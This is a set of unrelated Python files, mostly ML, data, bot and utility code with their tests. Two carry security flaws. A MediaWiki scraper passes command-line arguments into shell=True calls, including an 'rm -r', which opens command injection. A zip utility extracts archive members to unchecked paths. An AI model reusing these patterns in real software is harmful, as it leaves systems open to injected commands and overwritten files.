self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 4, 3, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose(self):
model = pixelcnn.ConvTranspose(features=4, kernel_size = (3, 2))
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (3, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 6, 4, 4))
self.assert_mean_and_variance(out)
def test_conv_transpose_down(self):
model = pixelcnn.ConvTransposeDown(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']["ConvWeightNorm_0"]["weightnorm_params"]
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 3, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_conv_transpose_down_right(self):
model = pixelcnn.ConvTransposeDownRight(features=4)
out, variables = model.init_with_output(self.rng, self.x)
params = variables['params']['ConvWeightNorm_0']['weightnorm_params']
direction, scale, bias = self.get_weightnorm(params)
self.assertEqual(direction.shape, (2, 2, 2, 4))
self.assertEqual(scale.shape, (4,))
self.assertEqual(bias.shape, (4,))
self.assertEqual(out.shape, (1, 8, 6, 4))
def test_pcnn_shape(self):
x = random.normal(self.rng, (2, 4, 4, 3))
model = pixelcnn.PixelCNNPP(depth=0, features=2, dropout_p=0)
out, _ = model.init_with_output(self.rng, x, train=False)
self.assertEqual(out.shape, (2, 4, 4, 100))
if __name__ == '__main__':
absltest.main()
|
#!/usr/bin/env python
import os
import sys
import unittest
DIR = os.path.dirname(os.path.abspath(__file__))
sys.path[0] = os.path.dirname(DIR)
from yorbay.lang import get_lang_chain
class TestLangChain(unittest.TestCase):
def test_get_lang_chain(self):
self.assertEqual(get_lang_chain('root'), ['root'])
self.assertEqual(get_lang_chain('en'), ['en', 'root'])
self.assertEqual(get_lang_chain('en_US'), ['en_US', 'en', 'root'])
self.assertEqual(get_lang_chain('en_US_POSIX'), ['en_US_POSIX', 'en_US', 'en', 'root'])
if __name__ == '__main__':
unittest.main()
|
from Functions.Featurespace import Classifier
from Functions.Featurespace import FeatureSpace
from Functions.Featurespace import find_annodir
import os
import cv2
import numpy as np
featurelist = FeatureSpace()
type_list = find_annodir()
# Run through all types
for types in type_list:
print(f"Importing {types}")
# Run through all subtypes
for category in os.listdir(types):
mask_path = os.listdir(f"{types}/{category}/rgbMasks")
# Get filenames
for images in mask_path:
# Load image
if images.endswith('.png'):
img = cv2.imread(f"{types}/{category}/rgbMasks/{images}", 0)
if img is not None and np.mean(img) > 0:
cnt, hir = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_NONE)[-2:]
for contours, hierarchy in zip(cnt, hir):
featurelist.create_features(contours, hierarchy, f"{types}_{category}")
if types == 'ROE':
print('Done import')
break
path = os.getcwd()
os.chdir(path.replace('\Annotations', ''))
classifier_path = 'classifier.pkl'
clf = Classifier()
clf.prepare_training_data(featurelist.get_features(), featurelist.type)
if os.path.exists(classifier_path):
clf.load_trained_classifier(classifier_path)
else:
clf.train_classifier()
clf.save_trained_classifier(classifier_path)
|
def simpleiterator():
yield 2
yield 4
yield 6
for element in simpleiterator():
print('iterator returned: %d' % element)
input("press enter to continue")
|
from discord.ext import commands
import traceback
import discord
errors = {
commands.MissingRequiredArgument: "{e.param} is a required argument.",
commands.BadArgument: "Invalid argument.",
commands.PrivateMessageOnly: "This command can only be used in private messages.",
commands.NoPrivateMessage: "This command can only be used in a server.",
commands.CommandNotFound: "This command does not exist.",
commands.CommandOnCooldown: "Please wait another {round(e.retry_after)} seconds before using this command again.",
commands.MaxConcurrencyReached: "This command has reached its maximum uses.",
commands.NotOwner: "You must be the owner of this bot to use this command.",
commands.MemberNotFound: "A member named {e.argument} does not exist.",
commands.GuildNotFound: "A server named {e.argument} does not exist.",
commands.RoleNotFound: "A role named {e.argument} does not exist.",
commands.ChannelNotFound: "A channel named {e.argument} does not exist.",
commands.MessageNotFound: "A message named {e.argument} does not exist.",
commands.EmojiNotFound: "An emoji named {e.argument} does not exist.",
commands.MissingPermissions: "You don't have permission to use this command.",
commands.BotMissingPermissions: "I don't have permissions to execute this command.",
commands.MissingRole: "You don't have the required role to use this command.",
commands.MissingRole: "You don't have any of the required roles to use this command.",
commands.BotMissingRole: "I don't have the required role to execute this command.",
commands.BotMissingRole: "I don't have the required role to execute this command.",
commands.NSFWChannelRequired: "This command can only be used in an NSFW channel."
}
class ErrorHandler(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, exception: Exception):
embed = discord.Embed(color=self.bot.config["colors"]["error"])
embed.set_author(name="Error", icon_url=self.bot.config["icons"]["error"])
try:
embed.description = errors[type(exception)].format(e=exception)
except KeyError:
raise exception
else:
await ctx.reply(embed=embed)
def setup(bot):
bot.add_cog(ErrorHandler(bot))
|
# Generated by Django 4.0.3 on 2022-04-07 11:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='user',
name='first_name',
field=models.CharField(default='deneme', max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='user',
name='last_name',
field=models.CharField(default='deneme', max_length=50),
preserve_default=False,
),
]
|
from __future__ import unicode_literals
import os
import random
import re
import subprocess
import sys
import time
import urllib
with open(sys.argv[1]) as input:
for line in input:
page = line.decode('utf-8').rstrip('\n')
page_quote = re.sub(r'\/', '%2F', urllib.quote(page.encode('utf-8')))
output_path = os.path.join(sys.argv[2], page_quote + '.txt')
if os.path.exists(output_path):
print "Page exists: " + output_path
continue
print "Trying to get: " + output_path
try:
subprocess.call('rm -r %s' % sys.argv[3], shell=True)
except OSError:
pass
try:
subprocess.call('rm %s' % sys.argv[3], shell=True)
except OSError:
pass
command = ('mediawiki-extensions-Collection-OfflineContentGenerator-bundler/bin/mw-ocg-bundler' +
' -o %s --prefix enwiki "%s"' % (sys.argv[3], page))
subprocess.call(command, shell=True)
command = ('mw-ocg-texter/bin/mw-ocg-texter -o "%s/%s.txt" %s' % (sys.argv[2], page_quote, sys.argv[3]))
subprocess.call(command, shell=True)
print "Attempt complete"
time.sleep(8 * random.random())
|
import os
import pandas as pd
from pandas.plotting import scatter_matrix
import matplotlib.pyplot as plt
from pathlib import Path
"""CONSTANTES (en mayuscula)"""
path = Path(__file__) # PATH A LA FILE EN CUALQUIER ORDENADOR
path2 = Path(path.parent) # Un directorio hacia atras
path3 = Path(path2.parent)
PATH4 = str(Path(path3.parent))
class CSVPlot():
def __init__(self, df):
self.df = df
def plot(self, grafico=4, columnas=[]):
assert type(self.df)==pd.DataFrame, "Cuidado! Tus datos de entrada tienen que ser un Dataframe"
if columnas:
df = self.df[columnas]
else:
df = self.df
if grafico == 0:
self.plot_histograma(df)
elif grafico == 1:
self.plot_densidad(df)
elif grafico == 2:
self.plot_bigotes(df)
elif grafico == 3:
self.plot_correlacion(df)
elif grafico == 4:
self.plot_dispersion(df)
else:
pass
def plot_histograma(self, df, output=False):
df.hist()
if not output:
plt.show()
else:
plt.savefig(output)
def plot_densidad(self, df, output=False):
df.plot(subplots=True, layout=(10, 4), sharex = False) # kind="density" ¿No funciona?
if not output:
plt.show()
else:
plt.savefig(output)
def plot_bigotes(self, df, output=False):
df.plot(kind='box', subplots=True, layout=(10, 4), sharex=False, sharey=False)
if not output:
plt.show()
else:
plt.savefig(output)
def plot_correlacion(self, df, output=False):
correlaciones = df.corr()
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.matshow(correlaciones, vmin=-1, vmax=1)
fig.colorbar(cax)
if not output:
plt.show()
else:
plt.savefig(output)
def plot_dispersion(self, df, output=False):
scatter_matrix(df)
if not output:
plt.show()
else:
plt.savefig(output)
def guardar_plot(self, save=True): # Opcion a guardar el plot
columns = self.df.columns.values
for column in columns:
try:
self.df.hist(column=column)
if save:
my_file = f'data/{column}.png'
plt.savefig(os.path.join(PATH4, my_file))
else:
pass
except ValueError: #Para columnas no numericas!
pass
def borrar_plot(self):
columns = self.df.columns.values
for column in columns:
my_file = f'data/{column}.png'
try:
os.remove(os.path.join(PATH4, my_file))
except FileNotFoundError:
pass
"""Opcion a eliminar el plot"""
if __name__ == "__main__":
df = pd.read_csv("../../data/csv_barcelona.csv")
plot = CSVPlot(df)
plot.borrar_plot()
|
from __future__ import division
import numpy as np
import os
import pytest
from autoperiod import Autoperiod
from pytest import approx
from autoperiod.helpers import load_google_trends_csv, load_gpfs_csv
def data(name):
return os.path.join(os.path.dirname(__file__), "data", name)
def test_clean_sinwave():
times = np.arange(0, 10, 0.01)
values = np.sin(2 * np.pi * times)
period = Autoperiod(times, values).period
assert period == approx(1.0, abs=0.1)
@pytest.mark.parametrize(
"trange,freqscale",
[
(20, 2.0),
(20, 4.0),
(40, 2.0),
(40, 4.0)
]
)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_tight_sinwave(trange, freqscale, threshold_method):
times = np.arange(0, trange, 0.01)
values = np.sin(freqscale * np.pi * times)
period = Autoperiod(times, values, threshold_method=threshold_method).period
# TODO: increase precision
assert period == approx(2.0 / freqscale, abs=2e-2)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_squarewave(threshold_method):
# TODO: this case is very fragile
values = np.array([0, 0, 1, 1] * 10, np.float)
times = np.arange(0, values.size, dtype=np.float)
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == 4.0
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_trends_newyears(threshold_method):
times, values = load_google_trends_csv(data("trends_newyears.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
# within 3% of "expected" period
assert period == approx(365, rel=0.03)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_trends_easter(threshold_method):
times, values = load_google_trends_csv(data("trends_easter.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
# Easter isn't a fixed holiday, so the "expected" period won't be as close to 365 days
assert period == approx(365, rel=0.05)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_gpfs_reads(threshold_method):
times, values = load_gpfs_csv(data("ub-hpc-6665127-gpfs-reads.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == approx(9469, rel=0.01)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_gpfs_writes(threshold_method):
times, values = load_gpfs_csv(data("ub-hpc-6665127-gpfs-writes.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == approx(9560, rel=0.01)
@pytest.mark.parametrize("threshold_method", ["mc", "stat"])
def test_trends_python_nonperiodic(threshold_method):
times, values = load_google_trends_csv(data("trends_python.csv"))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period is None
@pytest.mark.parametrize("threshold_method", ['mc', 'stat'])
@pytest.mark.parametrize('filename,expect_period', [
('industry-2895978-gpfs-reads.csv', 180),
('industry-2896041-gpfs-writes.csv', 150)
])
def test_pcp_smallperiod(threshold_method, filename, expect_period):
# test for regression to false alarm large period
times, values = load_gpfs_csv(data(filename))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period == approx(expect_period, rel=0.01)
@pytest.mark.parametrize("mthd", ['mc', 'stat'])
def test_pcp_spiky_acf(mthd):
times, values = load_gpfs_csv(data("chemistry-1455991-gpfs-writes.csv"))
period = Autoperiod(times, values, threshold_method=mthd).period
assert period == approx(3660, rel=0.01)
@pytest.mark.parametrize("threshold_method", ['mc', 'stat'])
@pytest.mark.parametrize('filename', [
'ub-hpc-writes-cpn-k16-25-01.csv',
])
def test_pcp_noperiod(threshold_method, filename):
times, values = load_gpfs_csv(data(filename))
period = Autoperiod(times, values, threshold_method=threshold_method).period
assert period is None
|
from typing import List
import cv2
import numpy as np
import matplotlib.pyplot as plt
def get_color(idx) -> List[int]:
colors = [
(111, 74, 0),
(81, 0, 81),
(128, 64, 128),
(244, 35, 232),
(250, 170, 160),
(230, 150, 140),
(70, 70, 70),
(102, 102, 156),
(190, 153, 153),
(180, 165, 180),
(150, 100, 100),
(150, 120, 90),
(153, 153, 153),
(250, 170, 30),
(220, 220, 0),
(107, 142, 35),
(152, 251, 152),
(70, 130, 180),
(220, 20, 60),
(255, 0, 0),
(0, 0, 142),
(0, 0, 70),
(0, 60, 100),
(0, 0, 90),
(0, 0, 110),
(0, 80, 100),
(0, 0, 230),
(119, 11, 32),
(0, 0, 142),
]
color = colors[idx % len(colors)]
return color
def draw_bbox3d(image, bbox_vertices, color=(0, 200, 200), thickness=1):
for idx in range(bbox_vertices.shape[0] - 1):
v1 = (bbox_vertices[idx][0].item(), bbox_vertices[idx][1].item())
v2 = (bbox_vertices[idx + 1][0].item(), bbox_vertices[idx + 1][1].item())
image = cv2.line(image, v1, v2, color, thickness)
return image
def draw_line(image, v1, v2, color=(0, 200, 200), thickness=1) -> None:
return cv2.line(image, v1, v2, color, thickness)
def draw_circle(
image, position, radius=5, color=(250, 100, 100), thickness=1, fill=True
) -> None:
if fill:
thickness = -1
center = (int(position[0]), int(position[1]))
return cv2.circle(image, center, radius, color=color, thickness=thickness)
def draw_bbox2d(image, bbox2d, color=(0, 200, 200), thickness=1) -> None:
v1 = (int(bbox2d[0].item()), int(bbox2d[1].item()))
v2 = (int(bbox2d[2].item()), int(bbox2d[3].item()))
return cv2.rectangle(image, v1, v2, color, thickness)
def draw_text(
image,
text,
position,
scale=0.4,
color=(0, 0, 0),
font=cv2.FONT_HERSHEY_SIMPLEX,
bg_color=(255, 255, 255),
blend=0.33,
lineType=1,
) -> None:
position = [int(position[0]), int(position[1])]
if bg_color is not None:
text_size, _ = cv2.getTextSize(text, font, scale, lineType)
x_s = int(np.clip(position[0], a_min=0, a_max=image.shape[1]))
x_e = int(
np.clip(position[0] + text_size[0] - 1 + 4, a_min=0, a_max=image.shape[1])
)
y_s = int(
np.clip(position[1] - text_size[1] - 2, a_min=0, a_max=image.shape[0])
)
y_e = int(np.clip(position[1] + 1 - 2, a_min=0, a_max=image.shape[0]))
image[y_s : y_e + 1, x_s : x_e + 1, 0] = image[
y_s : y_e + 1, x_s : x_e + 1, 0
] * blend + bg_color[0] * (1 - blend)
image[y_s : y_e + 1, x_s : x_e + 1, 1] = image[
y_s : y_e + 1, x_s : x_e + 1, 1
] * blend + bg_color[1] * (1 - blend)
image[y_s : y_e + 1, x_s : x_e + 1, 2] = image[
y_s : y_e + 1, x_s : x_e + 1, 2
] * blend + bg_color[2] * (1 - blend)
position[0] = int(np.clip(position[0] + 2, a_min=0, a_max=image.shape[1]))
position[1] = int(np.clip(position[1] - 2, a_min=0, a_max=image.shape[0]))
return cv2.putText(image, text, tuple(position), font, scale, color, lineType)
def draw_attn(image, attn) -> None:
attn = cv2.applyColorMap(attn[None], cv2.COLORMAP_JET)
return cv2.addWeighted(attn, 0.6, image, 0.3, 0)
def apply_mask(image, mask, color, alpha=0.5):
"""Apply the given mask to the image."""
for c in range(3):
image[:, :, c] = np.where(
mask == 1, image[:, :, c] * (1 - alpha) + alpha * color[c], image[:, :, c],
)
return image
def imshow(image, attn=None, figure_num=None) -> None:
if figure_num is not None:
plt.figure(figure_num)
else:
f, axs = plt.subplots(1, 1, figsize=(15, 15))
if len(image.shape) == 2:
image = np.tile(image, [3, 1, 1]).transpose([1, 2, 0])
plt.tick_params(labelbottom="off", labelleft="off")
plt.imshow(cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_RGB2BGR))
if attn is not None:
plt.imshow(attn, cmap=plt.cm.viridis, interpolation="nearest", alpha=0.9)
plt.show(block=False)
def imsave(file_name, image, figure_num=None) -> None:
if figure_num is not None:
plt.figure(figure_num)
else:
f, axs = plt.subplots(1, 1, figsize=(15, 15))
if len(image.shape) == 2:
image = np.tile(image, [3, 1, 1]).transpose([1, 2, 0])
plt.tick_params(labelbottom="off", labelleft="off")
plt.imsave(file_name, cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_RGB2BGR))
|
"""
Play namidaga kirari by spitz
"""
from time import sleep
from pyroombaadapter import PyRoombaAdapter
PORT = "/dev/ttyUSB0"
adapter = PyRoombaAdapter(PORT)
adapter.send_song_cmd(0, 10,
[66, 67, 69, 67, 66, 62, 64, 66, 67, 66],
[16, 16, 16, 32, 32, 16, 16, 16, 16, 64])
sleep(1.0)
adapter.send_song_cmd(1, 9,
[66, 67, 69, 67, 66, 71, 59, 62, 61],
[16, 16, 16, 32, 32, 32, 16, 16, 64])
sleep(1.0)
adapter.send_song_cmd(2, 13,
[62, 64, 61, 62, 64, 66, 62, 64, 66, 67, 64, 66, 71],
[16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16, 16])
sleep(1.0)
adapter.send_song_cmd(3, 7,
[71, 67, 64, 62, 61, 62, 62],
[16, 16, 16, 16, 48, 16, 64])
sleep(3.0)
adapter.send_play_cmd(0)
sleep(4.0)
adapter.send_play_cmd(1)
sleep(4.0)
adapter.send_play_cmd(0)
sleep(4.0)
adapter.send_play_cmd(1)
sleep(4.0)
adapter.send_play_cmd(2)
sleep(4.0)
adapter.send_play_cmd(3)
sleep(4.0)
|
weapons_dict = {
1: { 'name': 'Grape', 'damage': 4, 'cost': 0},
2: { 'name': 'Strawberry', 'damage': 6, 'cost': 1000},
3: { 'name': 'Peach Slices', 'damage': 8, 'cost': 2000},
4: { 'name': 'Pizza', 'damage': 12, 'cost': 4000},
5: { 'name': 'Mixed Veggies', 'damage': 16, 'cost': 8000},
6: { 'name': 'Hamburger', 'damage': 24, 'cost': 10000},
7: { 'name': 'Fruit Cocktail', 'damage': 32, 'cost': 20000},
8: { 'name': 'Rotten Apple', 'damage': 40, 'cost': 40000},
9: { 'name': 'Mystery Meat', 'damage': 56, 'cost': 80000},
10: { 'name': 'Tomato', 'damage': 72, 'cost': 100000},
11: { 'name': 'Cottage Cheese', 'damage': 92, 'cost': 200000},
12: { 'name': 'Taco', 'damage': 112, 'cost': 400000},
13: { 'name': 'Milk', 'damage': 136, 'cost': 800000},
14: { 'name': 'Egg', 'damage': 166, 'cost': 1000000},
15: { 'name': 'Chocolate Milk', 'damage': 200, 'cost': 2000000},
16: { 'name': 'Salad', 'damage': 250, 'cost': 4000000},
17: { 'name': 'Chili', 'damage': 300, 'cost': 8000000},
18: { 'name': 'Nachos', 'damage': 400, 'cost': 10000000},
19: { 'name': 'Sloppy Joe', 'damage': 500, 'cost': 50000000},
20: { 'name': 'Cream Pie', 'damage': 750, 'cost': 100000000}
}
armor_dict = {
1: { 'name': 'T-Shirt', 'defense': 1, 'cost': 0},
2: { 'name': 'Work Shirt', 'defense': 2, 'cost': 1000},
3: { 'name': 'Polo Shirt', 'defense': 4, 'cost': 2000},
4: { 'name': 'Jogging Suit', 'defense': 8, 'cost': 4000},
5: { 'name': 'Sweater', 'defense': 12, 'cost': 8000},
6: { 'name': 'Poncho', 'defense': 16, 'cost': 10000},
7: { 'name': 'Windbreaker', 'defense': 24, 'cost': 20000},
8: { 'name': 'Cotton Jacket', 'defense': 32, 'cost': 40000},
9: { 'name': 'Wool Jacket', 'defense': 40, 'cost': 80000},
10: { 'name': 'Denim Jacket', 'defense': 56, 'cost': 100000},
11: { 'name': 'Saran Wrap', 'defense': 72, 'cost': 200000},
12: { 'name': 'Aluminum Foil', 'defense': 88, 'cost': 400000},
13: { 'name': 'Raincoat', 'defense': 102, 'cost': 800000},
14: { 'name': 'Tennis Racket', 'defense': 126, 'cost': 1000000},
15: { 'name': 'Plastic Tray', 'defense': 140, 'cost': 2000000},
16: { 'name': 'Trashcan Lid', 'defense': 170, 'cost': 4000000},
17: { 'name': 'Umbrella', 'defense': 200, 'cost': 8000000},
18: { 'name': 'Mirror', 'defense': 250, 'cost': 10000000},
19: { 'name': 'Pup Tent', 'defense': 300, 'cost': 50000000},
20: { 'name': 'Teacher Costume', 'defense': 400, 'cost': 100000000}
}
|
"""Constants for Dune HD integration."""
from __future__ import annotations
from typing import Final
ATTR_MANUFACTURER: Final = "Dune"
DOMAIN: Final = "dunehd"
DEFAULT_NAME: Final = "Dune HD"
|
from __future__ import print_function
from .conda_interface import get_index
import conda_build.config
#import conda_build_all.logging
import conda_build_all.version_matrix as vn_matrix
from conda_build_all.version_matrix import setup_vn_mtx_case
class ResolvedDistribution(object):
"""
Represents a conda pacakge, with the appropriate special case
versions fixed (e.g. CONDA_PY, CONDA_NPY). Without this, a meta
changes as the conda_build.config.CONDA_NPY changes.
Parameters
----------
meta: conda_build.metadata.MetData
The package which has been resolved.
special_versions: iterable
A list of the versions which have been resolved for this package.
e.g. ``(['python', '27'],)``
"""
def __init__(self, meta, special_versions=()):
self.meta = meta
self.special_versions = special_versions
def __repr__(self):
return 'BakedDistribution({}, {})'.format(self.meta,
self.special_versions)
def __str__(self):
return self.dist()
def vn_context(self, config=None):
return setup_vn_mtx_case(self.special_versions, config)
def __getattr__(self, name):
if hasattr(self.meta, 'config'):
config = setup_vn_mtx_case(self.special_versions,
config=self.meta.config)
self.meta.parse_again(config)
else:
with setup_vn_mtx_case(self.special_versions):
self.meta.parse_again()
result = getattr(self.meta, name)
# Wrap any callable such that it is called within the appropriate
# environment.
# callable exists in python 2.* and >=3.2
if callable(result):
orig_result = result
import functools
@functools.wraps(result)
def with_vn_mtx_setup(*args, **kwargs):
if hasattr(self.meta, 'config'):
config = setup_vn_mtx_case(self.special_versions,
config=self.meta.config)
self.meta.parse_again(config=config)
return orig_result(*args, **kwargs)
else:
with setup_vn_mtx_case(self.special_versions):
self.meta.parse_again()
return orig_result(*args, **kwargs)
result = with_vn_mtx_setup
return result
@classmethod
def resolve_all(cls, meta, index=None, extra_conditions=None):
"""
Given a package, return a list of ResolvedDistributions, one for each
possible (necessary) version permutation.
"""
if index is None:
with vn_matrix.override_conda_logging('WARN'):
index = get_index()
cases = sorted(vn_matrix.special_case_version_matrix(meta, index))
if extra_conditions:
cases = list(vn_matrix.filter_cases(cases, extra_conditions))
result = []
for case in cases:
dist = cls(meta, case)
if not dist.skip():
result.append(dist)
return result
|
import asyncio
from typing import *
import aio_pika
from twitterscraper.utils import Singleton
ConsumerCallback = Callable[[bytes], Awaitable[None]]
class AMQPClient(Singleton):
get: Callable[..., "AMQPClient"]
_connection: aio_pika.Connection
_channel: aio_pika.Channel
def __init__(self, uri: str):
self._uri = uri
self._exchanges = dict()
# noinspection PyTypeChecker
self._connection, self._channel = None, None
async def connect(self, loop: Optional[asyncio.AbstractEventLoop] = None):
print("AMQP Connecting...")
if loop is None:
loop = asyncio.get_event_loop()
self._connection = await aio_pika.robust_connection.connect_robust(self._uri, loop=loop)
self._channel = await self._connection.channel()
print("AMQP Connected")
async def get_exchange(self, exchange_name: str) -> aio_pika.Exchange:
# TODO implement locks for possible concurrent accesses
exchange = self._exchanges.get(exchange_name)
if exchange is not None:
return exchange
if not exchange_name:
exchange = self._channel.default_exchange
else:
# TODO not tested
exchange = await self._channel.get_exchange(exchange_name, ensure=True)
self._exchanges[exchange_name] = exchange
return exchange
async def enqueue(
self,
exchange: str,
routingkey: str,
persistent: bool,
payloads: List[Union[bytes, str]]
):
exchange = await self.get_exchange(exchange)
coroutines = list()
# TODO run in batches
# TODO wrap in AMQP transaction
for payload in payloads:
if isinstance(payload, str):
payload = payload.encode("utf-8")
message = aio_pika.Message(body=payload)
if persistent:
message.delivery_mode = aio_pika.DeliveryMode(aio_pika.DeliveryMode.PERSISTENT)
coroutines.append(exchange.publish(
message=message,
routing_key=routingkey
))
print(f"AMQP TX exchange={exchange} routingkey={routingkey} payload={payload}")
await asyncio.gather(*coroutines)
async def consume(self, queue: str, callback: ConsumerCallback, workers: int, msg_limit: Optional[int] = None):
"""Async blocking consume"""
print("Consuming", queue)
queue = await self._channel.get_queue(queue, ensure=True)
await self._channel.set_qos(prefetch_count=workers)
consumed_msgs = 0 if msg_limit is not None else None
async def _message_handler_task(message: aio_pika.IncomingMessage):
try:
print("AMQP RX", message.body)
await callback(message.body)
except Exception as ex:
print("AMQP RX Callback exception:", ex)
message.nack()
raise ex
else:
message.ack()
async with queue.iterator() as queue_iter:
async for _message in queue_iter:
if msg_limit is None:
# Worker execution mode
asyncio.create_task(_message_handler_task(_message))
else:
# Run-once execution mode
await _message_handler_task(_message)
consumed_msgs += 1
if consumed_msgs >= msg_limit:
break
async def close(self):
print("AMQP Closing...")
if self._channel:
await self._channel.close()
if self._connection:
await self._connection.close()
print("AMQP Closed")
|
from django.core.urlresolvers import reverse
from seahub.test_utils import BaseTestCase
class PasswordChangeTest(BaseTestCase):
def test_can_render(self):
self.login_as(self.user)
resp = self.client.get(reverse('auth_password_change'))
self.assertEqual(200, resp.status_code)
self.assertContains(resp, 'Password Modification')
def test_can_change(self):
self.login_as(self.user)
resp = self.client.post(
reverse('auth_password_change'), {
'old_password': self.user_password,
'new_password1': '123',
'new_password2': '123',
}
)
self.assertEqual(302, resp.status_code)
self.assertRedirects(resp, reverse('auth_password_change_done'))
|
from flask import Flask, request
from flask_restful import Resource, Api
from json import dumps
from flask_cors import CORS
import time
from pymongo import MongoClient
import os
import copy
# Create Flask RESTful api with CORS
app = Flask(__name__)
CORS(app)
api = Api(app)
# Load DB
client = MongoClient('mongodb://admin:{}@localhost:27017/yeet'.format(os.environ["YEET_DB_PASS"]))
db = client['yeet']
# Get expiration time (in seconds) from environ or default to 12 hours
if "YEET_DB_EXPIRE" in os.environ.keys():
expiration_seconds = int(os.environ["YEET_DB_EXPIRE"])
else:
expiration_seconds = 12 * 60 * 60
# Load collection and set expiration
collection = db['yeets']
collection.drop_index("time_1")
collection.ensure_index("time", expireAfterSeconds=expiration_seconds)
# Define the function for the TO endpoint
class to_app(Resource):
def get(self, yeet):
# Add document to DB collection
document = {"time": time.time(), "yeet_name": yeet, "data": request.args.get('data')}
collection.insert_one(copy.copy(document))
# Return document with success message
document["success"] = True
return document
# Define the function for the FROM endpoint
class from_app(Resource):
def get(self, yeet):
# Get most recent document with that yeet name and check if it exists
document = collection.find_one({"yeet_name": yeet})
if not (document is None):
# If it exists, create response and delete document
response = {"time_created": document["time"], "time_fetched": time.time(), "yeet_name": yeet, "data": document["data"], "success": True}
collection.delete_one({"yeet_name": yeet})
else:
# If it doesn't exist, return a message
response = {"success": False, "error": "That yeet does not exist, it could have expired or someone could have read it already."}
return response
api.add_resource(to_app, '/to/<yeet>')
api.add_resource(from_app, '/from/<yeet>')
if __name__ == '__main__':
app.run(port='8080')
|
from tweetguessr.tweetguessr import TweetGuessr
args = vars(TweetGuessr.parse_arguments())
tweetguessr = TweetGuessr(args)
tweetguessr.main(args)
|
#!/usr/bin/env python
# (c) 2017-2018, ETH Zurich, Institut fuer Theoretische Physik
# Author: Dominik Gresch <greschd@gmx.ch>
import numpy as np
import pymatgen as mg
import pymatgen.symmetry.analyzer
import symmetry_representation as sr
POS_In = (0, 0, 0)
POS_As = (0.25, 0.25, 0.25)
orbitals = []
for spin in (sr.SPIN_UP, sr.SPIN_DOWN):
orbitals.extend([
sr.Orbital(position=POS_In, function_string=fct, spin=spin)
for fct in sr.WANNIER_ORBITALS['s'] + sr.WANNIER_ORBITALS['p']
])
orbitals.extend([
sr.Orbital(position=POS_As, function_string=fct, spin=spin)
for fct in sr.WANNIER_ORBITALS['p']
])
structure = mg.Structure(
lattice=[[0., 3.029, 3.029], [3.029, 0., 3.029], [3.029, 3.029, 0.]],
species=['In', 'As'],
coords=np.array([[0, 0, 0], [0.25, 0.25, 0.25]])
)
analyzer = mg.symmetry.analyzer.SpacegroupAnalyzer(structure)
symops = analyzer.get_symmetry_operations(cartesian=False)
symops_cart = analyzer.get_symmetry_operations(cartesian=True)
symmetry_group = sr.SymmetryGroup(
symmetries=[
sr.SymmetryOperation.from_orbitals(
orbitals=orbitals,
real_space_operator=sr.RealSpaceOperator.
from_pymatgen(sym_reduced),
rotation_matrix_cartesian=sym_cart.rotation_matrix,
numeric=True
) for sym_reduced, sym_cart in zip(symops, symops_cart)
],
full_group=True
)
sr.io.save(symmetry_group, 'symmetries.hdf5')
|
#!/usr/bin/env python
#coding: utf8
"""Zipper
A class that can zip and unzip files.
"""
__author__ = "José Lopes de Oliveira Júnior"
__license__ = "GPLv3+"
import os
import zipfile
try:
import zlib
has_zlib = True
except:
has_zlib = False
class Zipper(object):
"""This is the main class.
Can zip and unzip files.
"""
def zip(self, file_to_zip, dir="./", name="Zipped_File.zip", mode="w"):
"""Zips file into dir with name.
Mode can be w to write a new file or
a to append in an existing file.
"""
if not name.endswith(".zip"):
name += ".zip"
if has_zlib:
compression = zipfile.ZIP_DEFLATED
else:
compression = zipfile.ZIP_STORED
zf = zipfile.ZipFile(name, mode)
zf.write(file_to_zip, compress_type=compression)
zf.close()
def unzip(self, file_to_unzip, dir="./"):
"""Unzips file into dir."""
zf = zipfile.ZipFile(file_to_unzip)
for content in zf.namelist():
if content.endswith('/'):
os.makedirs(content)
else:
out_file= open(os.path.join(dir, content), "wb")
out_file.write(zf.read(content))
out_file.close()
#EOF
|
import unittest
from talipp.indicators import SMMA
from TalippTest import TalippTest
class Test(TalippTest):
def setUp(self) -> None:
self.input_values = list(TalippTest.CLOSE_TMPL)
def test_init(self):
ind = SMMA(20, self.input_values)
print(ind)
self.assertAlmostEqual(ind[-3], 9.149589, places = 5)
self.assertAlmostEqual(ind[-2], 9.203610, places = 5)
self.assertAlmostEqual(ind[-1], 9.243429, places = 5)
def test_update(self):
self.assertIndicatorUpdate(SMMA(20, self.input_values))
def test_delete(self):
self.assertIndicatorDelete(SMMA(20, self.input_values))
def test_purge_oldest(self):
